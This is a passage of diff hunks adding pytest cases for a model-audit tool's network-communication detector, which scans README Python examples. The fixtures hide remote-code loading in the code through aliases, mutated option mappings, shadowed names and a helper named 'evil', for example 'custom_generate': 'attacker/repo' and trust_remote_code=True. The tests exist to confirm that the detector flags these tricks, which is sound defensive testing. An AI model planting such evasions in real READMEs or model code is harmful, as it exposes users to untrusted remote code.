+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "with torch.no_grad():\n"
+            "    inputs = processor(images=image, return_tensors='pt')\n"
+            f"    {generate_statement}"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "shadowing",
+        [
+            "def object():\n    return print()\nobject()\n",
+            "async def object():\n    return print()\nobject()\n",
+            "def helper(object):\n    return object(trust_remote_code=True)\n",
+            "def helper(object, /):\n    return object(trust_remote_code=True)\n",
+            "def helper(*, object):\n    return object(trust_remote_code=True)\n",
+            "def helper(*object):\n    return object(trust_remote_code=True)\n",
+            "def helper(**object):\n    return object(trust_remote_code=True)\n",
+            "def helper():\n    global object\n    return object()\n",
+            (
+                "def outer(object):\n"
+                "    def helper():\n"
+                "        nonlocal object\n"
+                "        return object(trust_remote_code=True)\n"
+                "    return helper()\n"
+            ),
+        ],
+        ids=[
+            "function-name",
+            "async-function-name",
+            "positional-argument",
+            "positional-only-argument",
+            "keyword-only-argument",
+            "vararg",
+            "kwarg",
+            "global-name",
+            "nonlocal-name",
+        ],
+    )
+    def test_readme_python_example_rejects_documented_builtin_shadowing(
+        self,
+        shadowing: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "with torch.no_grad():\n"
+            "    inputs = processor(images=image, return_tensors='pt')\n"
+            "    outputs: object = model.generate(**inputs)\n"
+            f"{shadowing}"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "generate_statement",
+        [
+            "outputs = model.generate(**inputs)\n",
+            "outputs: object = model.generate(**inputs)\n",
+        ],
+        ids=["assignment", "annotated-assignment"],
+    )
+    def test_readme_python_example_allows_mapping_mutation_after_eager_assigned_generate(
+        self,
+        generate_statement: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "with torch.no_grad():\n"
+            "    inputs = processor(images=image, return_tensors='pt')\n"
+            f"    {generate_statement}"
+            "    inputs['custom_generate'] = 'attacker/repo'\n"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "generate_statement",
+        [
+            "outputs = model.generate(**inputs)\n",
+            "outputs: object = model.generate(**inputs)\n",
+        ],
+        ids=["assignment", "annotated-assignment"],
+    )
+    def test_readme_python_example_rejects_mapping_mutation_before_eager_assigned_generate(
+        self,
+        generate_statement: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "with torch.no_grad():\n"
+            "    inputs = processor(images=image, return_tensors='pt')\n"
+            "    inputs['custom_generate'] = 'attacker/repo'\n"
+            f"    {generate_statement}"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "generate_statement",
+        [
+            "outputs = [model.generate(**inputs)]\n",
+            "outputs = lambda: model.generate(**inputs)\n",
+            "outputs = (model.generate(**inputs) for _ in range(1))\n",
+            "outputs = (generated := model.generate(**inputs))\n",
+            "if image.mode:\n        outputs = model.generate(**inputs)\n",
+            "outputs[0] = model.generate(**inputs)\n",
+        ],
+        ids=["container", "lambda", "generator", "walrus", "branch", "unsafe-target"],
+    )
+    def test_readme_python_example_rejects_non_direct_assigned_generate_in_no_grad(
+        self,
+        generate_statement: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "with torch.no_grad():\n"
+            "    inputs = processor(images=image, return_tensors='pt')\n"
+            f"    {generate_statement}"
+            "```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
 
     @pytest.mark.parametrize(
         "device_transfer",
@@ -5568,6 +5906,102 @@ class TestNetworkCommDetector:
         assert findings
         assert all(finding["severity"] == "INFO" for finding in findings)
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_allows_renamed_mapping_device_transfer(self) -> None:
+        """A safe transfer may bind a new mapping name before generate."""
+        data = (
+            b"```python\nimport requests\nfrom PIL import Image\n"
+            b"from transformers import AutoModel, AutoProcessor\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"processor = AutoProcessor.from_pretrained('official/model')\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"inputs = processor(images=image, return_tensors='pt')\n"
+            b"device_inputs = inputs.to('cuda')\n"
+            b"model.generate(**device_inputs)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "mapping_flow",
+        [
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "alias = inputs\n"
+                "alias |= {'custom_generate': 'attacker/repo'}\n"
+                "device_inputs = inputs.to('cuda')\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "alias = inputs\n"
+                "alias |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "alias = device_inputs\n"
+                "alias |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "inputs = {'custom_generate': 'attacker/repo'}\n"
+                "device_inputs = inputs.to('cuda')\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "device_inputs = {'custom_generate': 'attacker/repo'}\n"
+            ),
+            ("inputs = processor(images=image, return_tensors='pt')\ndevice_inputs = inputs.to(image.mode)\n"),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "if True:\n"
+                "    device_inputs = inputs.to('cuda')\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "def prepare():\n"
+                "    device_inputs = inputs.to('cuda')\n"
+            ),
+            ("inputs = processor(images=image, return_tensors='pt')\ndevice_inputs = inputs.tolist().to('cuda')\n"),
+        ],
+        ids=[
+            "source-alias-mutation",
+            "post-transfer-source-alias-mutation",
+            "destination-alias-mutation",
+            "source-rebind",
+            "destination-rebind",
+            "unsafe-device",
+            "branch-transfer",
+            "deferred-transfer",
+            "unsafe-intermediate",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_renamed_mapping_device_transfer(
+        self,
+        mapping_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_flow}"
+            "model.generate(**device_inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
 
     def test_readme_python_example_allows_ordered_nested_standalone_mapping_transfer(self) -> None:
         """A standalone transfer may follow its binding in one supported body."""

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -9,6 +9,7 @@ from urllib.parse import quote, urlparse
 
 import pytest
 
+from modelaudit.core import determine_exit_code, scan_model_directory_or_file
 from modelaudit.detectors import network_comm
 from modelaudit.detectors.network_comm import NetworkCommDetector, detect_network_communication
 
@@ -3025,6 +3026,143 @@ class TestNetworkCommDetector:
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
 
+    @pytest.mark.parametrize(
+        ("binding", "generate_argument"),
+        [
+            ("remote_options = {'custom_generate': 'attacker/repo'}\n", "**remote_options"),
+            (
+                "remote_key = 'custom_generate'\nremote_options = {remote_key: 'attacker/repo'}\n",
+                "**remote_options",
+            ),
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_generate_kwargs(
+        self,
+        binding: str,
+        generate_argument: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{binding}"
+            f"model.generate({generate_argument})\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "generate_arguments",
+        [
+            "None, None, None, None, None, None, None, None, None, None, 'attacker/repo'",
+            "None, None, None, None, None, None, None, None, None, None, None, 'attacker/repo'",
+        ],
+        ids=["transformers-v5", "transformers-v4"],
+    )
+    def test_readme_python_example_rejects_positional_custom_generate(self, generate_arguments: str) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"model.generate({generate_arguments})\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "remote_call",
+        [
+            "model.generate(**options)",
+            "AutoModel.from_pretrained('official/model', **options)",
+        ],
+    )
+    def test_readme_python_example_rejects_shadowed_remote_code_options(self, remote_call: str) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            f"def run(options):\n    {remote_call}\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "mutation",
+        [
+            ("for options['custom_generate'] in ['attacker/repo']:\n    model.generate(**options)\n"),
+            "[model.generate(**options) for options['custom_generate'] in ['attacker/repo']]\n",
+            ("alias = options\nfor alias['custom_generate'] in ['attacker/repo']:\n    model.generate(**options)\n"),
+            (
+                "alias: 'mapping' = options\n"
+                "for alias['custom_generate'] in ['attacker/repo']:\n"
+                "    model.generate(**options)\n"
+            ),
+            (
+                "first_alias = options\n"
+                "alias = first_alias\n"
+                "for alias['custom_generate'] in ['attacker/repo']:\n"
+                "    model.generate(**options)\n"
+            ),
+            (
+                "alias = first_alias = options\n"
+                "for alias['custom_generate'] in ['attacker/repo']:\n"
+                "    model.generate(**options)\n"
+            ),
+            (
+                "if True:\n"
+                "    alias = options\n"
+                "    for alias['custom_generate'] in ['attacker/repo']:\n"
+                "        model.generate(**options)\n"
+            ),
+            "model.generate(**options); options = {'custom_generate': 'attacker/repo'}\n",
+            (
+                "alias = options\n"
+                "for _ in range(2):\n"
+                "    model.generate(**options)\n"
+                "    for alias['custom_generate'] in ['attacker/repo']:\n"
+                "        pass\n"
+            ),
+        ],
+        ids=[
+            "for-target",
+            "comprehension-target",
+            "aliased-for-target",
+            "annotated-alias-for-target",
+            "chained-alias-for-target",
+            "chained-assignment-for-target",
+            "nested-alias-for-target",
+            "same-line-rebind-after-call",
+            "loop-alias-mutation-after-call",
+        ],
+    )
+    def test_readme_python_example_rejects_mutated_remote_code_options(self, mutation: str) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            f"{mutation}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
     def test_readme_python_example_allows_documented_generate_kwargs_unpacking(self) -> None:
         """`model.generate(**inputs)` is the canonical documented pattern and must stay benign."""
         data = (
@@ -3039,6 +3177,111 @@ class TestNetworkCommDetector:
         findings = NetworkCommDetector().scan(data, "README.md")
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "model_call",
+        [
+            "AutoModel.from_pretrained('official/model', **{'revision': 'main'})",
+            "AutoModel.from_pretrained('official/model', **{'trust_remote_code': False})",
+            "model.generate(custom_generate=None)",
+            "model.generate(**{'custom_generate': None})",
+            "safe_options = {'custom_generate': None}\nmodel.generate(**safe_options)",
+            ("safe_options = {'custom_generate': None}\nalias = safe_options\nmodel.generate(**alias)"),
+            ("safe_options = {'custom_generate': None}\nalias: 'mapping' = safe_options\nmodel.generate(**alias)"),
+            (
+                "safe_options = {'custom_generate': None}\n"
+                "first_alias = safe_options\n"
+                "alias = first_alias\n"
+                "model.generate(**alias)"
+            ),
+            ("alias = safe_options = {'custom_generate': None}\nmodel.generate(**alias)"),
+        ],
+    )
+    def test_readme_python_example_allows_proven_safe_remote_code_options(self, model_call: str) -> None:
+        model_setup = (
+            "" if model_call.startswith("AutoModel") else "model = AutoModel.from_pretrained('official/model')\n"
+        )
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            f"{model_setup}{model_call}\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "post_call_operation",
+        [
+            "copied = options['custom_generate']\n",
+            "for options['custom_generate'] in ['attacker/repo']:\n    pass\n",
+            "options = {'custom_generate': 'attacker/repo'}\n",
+        ],
+        ids=["read", "mutation", "rebind"],
+    )
+    def test_readme_python_example_allows_safe_options_used_before_later_operations(
+        self,
+        tmp_path: Path,
+        post_call_operation: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            "model.generate(**options)\n"
+            f"{post_call_operation}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+        readme_path = tmp_path / "README.md"
+        readme_path.write_bytes(data)
+
+        findings = NetworkCommDetector().scan(data, readme_path.name)
+        aggregate = scan_model_directory_or_file(str(readme_path), cache_enabled=False)
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+        assert determine_exit_code(aggregate) == 0
+
+    @pytest.mark.parametrize(
+        ("deferred_setup", "consume_deferred"),
+        [
+            (
+                "pending = (model.generate(**options) for _ in range(1))\n",
+                "for _ in pending:\n    pass\n",
+            ),
+            ("pending = lambda: model.generate(**options)\n", ""),
+            ("def pending():\n    return model.generate(**options)\n", ""),
+            ("async def pending():\n    return model.generate(**options)\n", ""),
+        ],
+        ids=["generator-expression", "lambda", "function", "async-function"],
+    )
+    def test_readme_python_example_rejects_deferred_generate_after_later_rebind(
+        self,
+        tmp_path: Path,
+        deferred_setup: str,
+        consume_deferred: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            f"{deferred_setup}"
+            "options = {'custom_generate': 'attacker/repo'}\n"
+            f"{consume_deferred}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+        readme_path = tmp_path / "README.md"
+        readme_path.write_bytes(data)
+
+        findings = NetworkCommDetector().scan(data, readme_path.name)
+        aggregate = scan_model_directory_or_file(str(readme_path), cache_enabled=False)
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+        assert determine_exit_code(aggregate) == 1
 
     def test_readme_python_example_allows_explicitly_disabled_remote_code_trust(self) -> None:
         data = (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3249,6 +3249,36 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
+        "processor_call",
+        [
+            (
+                "processor_options = {'images': image, 'return_tensors': 'pt'}\n"
+                "inputs = processor(**processor_options)\n"
+            ),
+            "inputs = processor(**{'images': image, 'return_tensors': 'pt'})\n",
+        ],
+        ids=["named-mapping", "literal-mapping"],
+    )
+    def test_readme_python_example_allows_static_processor_kwargs_unpacking(self, processor_call: str) -> None:
+        """Canonical processor options may be unpacked from a statically safe mapping."""
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{processor_call}"
+            "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
         ("factory_name", "instance_name", "inputs_expression"),
         [
             ("AutoTokenizer", "tokenizer", "tokenizer('hello', return_tensors='pt')"),
@@ -3294,9 +3324,10 @@ class TestNetworkCommDetector:
         "inputs_setup",
         [
             ("device = 'cpu'; inputs = processor(images=image, return_tensors='pt').to(device)\n"),
+            ("inputs = processor(images=image, return_tensors='pt').to(device='cuda')\n"),
             ("inputs = processor(images=image, return_tensors='pt'); inputs = inputs.to('cpu')\n"),
         ],
-        ids=["named-device", "mapping-rebind"],
+        ids=["named-device", "keyword-device", "mapping-rebind"],
     )
     def test_readme_python_example_allows_ordered_mapping_device_transfers(self, inputs_setup: str) -> None:
         """A unique device literal and provenance-preserving rebinding remain canonical."""
@@ -3402,6 +3433,29 @@ class TestNetworkCommDetector:
             ),
             (
                 "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "processor_key = 'images'\n"
+                "processor_options = {processor_key: image, 'return_tensors': 'pt'}\n"
+                "inputs = processor(**processor_options)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "processor_options = {'images': image}\n"
+                "processor_options = {'images': image, 'return_tensors': 'pt'}\n"
+                "inputs = processor(**processor_options)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "processor_options = {'images': image}\n"
+                "alias = processor_options\n"
+                "alias |= {'return_tensors': 'pt'}\n"
+                "inputs = processor(**processor_options)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "processor_options = image\ninputs = processor(**processor_options)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
                 "inputs = processor(images=image, return_tensors='pt')\n"
                 "alias = inputs\n"
                 "alias |= {'custom_generate': 'attacker/repo'}\n",
@@ -3424,6 +3478,18 @@ class TestNetworkCommDetector:
             ),
             (
                 "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "device = image.mode\ninputs = processor(images=image, return_tensors='pt').to(device=device)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "inputs = processor(images=image, return_tensors='pt').to('cpu', 'cuda')\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
+                "inputs = processor(images=image, return_tensors='pt').to(device='cuda', non_blocking=True)\n",
+            ),
+            (
+                "processor = AutoProcessor.from_pretrained('official/model')\n",
                 "device = 'cpu'; device = 'cuda'; inputs = processor(images=image, return_tensors='pt').to(device)\n",
             ),
             (
@@ -3443,11 +3509,18 @@ class TestNetworkCommDetector:
         ids=[
             "non-processor-factory",
             "dynamic-processor-options",
+            "computed-processor-key",
+            "rebound-processor-options",
+            "mutated-processor-options-alias",
+            "unproven-processor-options",
             "mutated-processor-output",
             "starred-processor-arguments",
             "remote-code-processor-option",
             "arbitrary-method-chain",
             "dynamic-device-transfer",
+            "dynamic-keyword-device-transfer",
+            "extra-positional-device-transfer",
+            "extra-keyword-device-transfer",
             "rebound-device-transfer",
             "malicious-mapping-rebind",
             "function-mapping-rebind",

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3056,6 +3056,315 @@ class TestNetworkCommDetector:
         assert any(finding["type"] == "network_function" for finding in findings)
 
     @pytest.mark.parametrize(
+        ("alias_setup", "remote_call"),
+        [
+            (
+                "loader = print('setup')\nloader = AutoModel.from_pretrained\n",
+                "loaded = loader('attacker/repo', trust_remote_code=True)\n",
+            ),
+            (
+                "loader = print('setup')\nloader = AutoModel.from_pretrained\n"
+                "remote_options = {'trust_remote_code': True}\n",
+                "loaded = loader('attacker/repo', **remote_options)\n",
+            ),
+            (
+                "runner = print('setup')\nrunner = model.generate\n",
+                "runner(custom_generate='attacker/repo')\n",
+            ),
+            (
+                "runner = print('setup')\nrunner = model.generate\n",
+                "runner(None, None, None, None, None, None, None, None, None, None, 'attacker/repo')\n",
+            ),
+            (
+                "loader = print('setup')\nloader = AutoModel.from_pretrained\nalias = loader\n",
+                "loaded = alias('attacker/repo', trust_remote_code=True)\n",
+            ),
+            (
+                "loader = print('setup')\nloader = AutoModel.from_pretrained\nif False:\n    loader = print\n",
+                "loaded = loader('attacker/repo', trust_remote_code=True)\n",
+            ),
+            (
+                "loader = print('setup')\nloader = AutoModel.from_pretrained if len(image_url) else print\n",
+                "loaded = loader('attacker/repo', trust_remote_code=True)\n",
+            ),
+        ],
+        ids=[
+            "from-pretrained-keyword",
+            "from-pretrained-mapping",
+            "generate-keyword",
+            "generate-positional",
+            "chained-callable-alias",
+            "conditional-rebind",
+            "conditional-expression",
+        ],
+    )
+    def test_readme_python_example_rejects_remote_code_through_named_callable_alias(
+        self,
+        alias_setup: str,
+        remote_call: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{alias_setup}{remote_call}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        ("alias_setup", "safe_call"),
+        [
+            (
+                "loader = print('setup')\nloader = AutoModel.from_pretrained\n",
+                "loaded = loader('official/model', trust_remote_code=False)\n",
+            ),
+            (
+                "runner = print('setup')\nrunner = model.generate\n",
+                "runner(None, None, None, None, None, None, None, None, None, None, True)\n",
+            ),
+            (
+                "loader = print('setup')\nloader = AutoModel.from_pretrained\nloader = print\n",
+                "loader('done')\n",
+            ),
+            (
+                "loader = print('setup')\nloader = AutoModel.from_pretrained\nalias = loader\n",
+                "loaded = alias('official/model', trust_remote_code=False)\n",
+            ),
+        ],
+        ids=[
+            "safe-from-pretrained",
+            "safe-v4-generate",
+            "definite-benign-rebind",
+            "safe-chained-callable-alias",
+        ],
+    )
+    def test_readme_python_example_allows_safe_named_callable_alias(
+        self,
+        alias_setup: str,
+        safe_call: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{alias_setup}{safe_call}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "alias_setup",
+        [
+            "runner = model.generate if len(image_url) == 0 else evil\n",
+            "runner = model.generate if len(image_url) == 0 else print\n",
+            "runner = [model.generate, evil][1]\n",
+            "runner = {'safe': model.generate, 'evil': evil}['evil']\n",
+            "runner = model.generate and evil\n",
+            ("if len(image_url) == 0:\n    runner = model.generate\nelse:\n    runner = evil\n"),
+        ],
+        ids=["conditional", "documented-builtin", "list", "dict", "bool-op", "if-statement"],
+    )
+    def test_readme_python_example_rejects_mixed_sensitive_callable_alias(
+        self,
+        alias_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "def evil():\n"
+            "    for _ in range(1):\n"
+            "        requests.get(image_url, stream=True)\n"
+            f"{alias_setup}"
+            "runner()\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "alias_setup",
+        [
+            "runner = model.generate if len(image_url) == 0 else model.generate\n",
+            "runner = [model.generate, model.generate][1]\n",
+            "runner = {'first': model.generate, 'second': model.generate}['second']\n",
+            "runner = model.generate and model.generate\n",
+            ("if len(image_url) == 0:\n    runner = model.generate\nelse:\n    runner = model.generate\n"),
+        ],
+        ids=["conditional", "list", "dict", "bool-op", "if-statement"],
+    )
+    def test_readme_python_example_allows_exclusively_sensitive_callable_alias(
+        self,
+        alias_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{alias_setup}"
+            "runner()\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "call_setup",
+        [
+            "calls = [runner() for runner in [evil]]\n",
+            "(runner := evil)\nrunner()\n",
+            "for runner in [evil]:\n    pass\nrunner()\n",
+            "def runner():\n    requests.get(image_url, stream=True)\nrunner()\n",
+        ],
+        ids=["comprehension-target", "walrus", "loop-target", "function-rebind"],
+    )
+    def test_readme_python_example_rejects_unmodeled_sensitive_callable_overwrite(
+        self,
+        call_setup: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "def evil():\n"
+            "    for _ in range(1):\n"
+            "        requests.get(image_url, stream=True)\n"
+            "runner = model.generate\n"
+            f"{call_setup}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "call_setup",
+        [
